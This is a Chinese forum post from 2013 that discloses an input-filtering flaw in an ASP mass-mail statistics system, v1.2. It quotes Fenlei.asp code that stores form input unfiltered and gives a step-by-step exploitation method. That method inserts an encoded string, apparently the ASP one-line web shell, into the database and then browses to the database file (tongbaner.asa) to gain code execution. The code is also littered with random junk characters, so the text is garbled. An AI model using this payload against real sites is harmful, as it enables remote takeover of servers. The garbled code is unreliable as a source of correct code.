找回密码
 立即注册
查看: 2755|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
* l  _2 P2 W. T, e. }0 A
) n. w0 y$ x6 T+ M+ \IF Request.QueryString("Action")="del" Then / W- U9 x) F$ v' X# T
ID=Request.QueryString("ID") $ N" e# M* |4 S& O
IF Countss ("tui","Fenlei",ID )<>0 then 4 D4 o) |/ S* x- \& E
'略
7 C3 v% N* M9 m1 ~1 K: |% y) FIF Request.QueryString("Action")="Add" Then
/ V- M' G7 b3 Z+ ?1 H' F: \# ZTname=Request.Form("Typename")
" {' @% C+ T3 R3 }" ]% wSet Rs=Server.CreateObject("adodb.Recordset") 6 e, L1 L6 m) T. V% i$ b1 G! v" }
Sql="Select * From Fenlei Order by id Desc " 9 p  G4 C- o/ I! n+ r
Rs.Open Sql,Conn,1,3 8 q$ Z  P& S& j8 N- Z$ D+ I$ f
Rs.Addnew ! q" k( S+ O: X# F- K) E+ Z
Rs("Typename")=Tname . e: l2 p) X$ q1 L4 ^3 o- ?& t
'略
) P2 C; I4 e) O8 Q3 T+ w1 i. ]! dSet Rs=Server.CreateObject("adodb.Recordset")
0 ?+ w( h& C. j$ a( l) U( fSql="Select * From Fenlei Order by id Desc "
* ?# A/ J: j& |7 TRs.Open Sql,Conn,1,1 * E: n: x- f, U& x
'略 * r! p: R- J& ^" Y& h% t
%>
1 `& H+ z. a1 \; C' q; {. M+ ~ * H7 X* Y3 G) a

2 g! f, P- F. P, _! d
5 }$ g$ A+ l8 B, `4 @没有过滤,直接写入数据库。3 v  y1 s: _# V9 Z3 w
9 Y$ j: t. h7 p0 K3 h3 O( S
利用方法:
% h/ ?& }3 V4 j* e3 D
6 i# p7 d- P% Y插入:┼攠數畣整爠煥敵瑳∨≡┩>
3 a' V6 m- A; e8 j: c7 n& ]
! z& H$ j% K4 P: C" F
+ a; T: F( k3 }" c/ i5 w1 q连接: http://www.xxx.com/###tongbaner.asa
( g  d3 E/ [' q5 T! l'默认安装文件: 8 L2 H% i2 j* X9 G: C( }
'install.asp
8 B' @  L; i+ j! m9 T
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表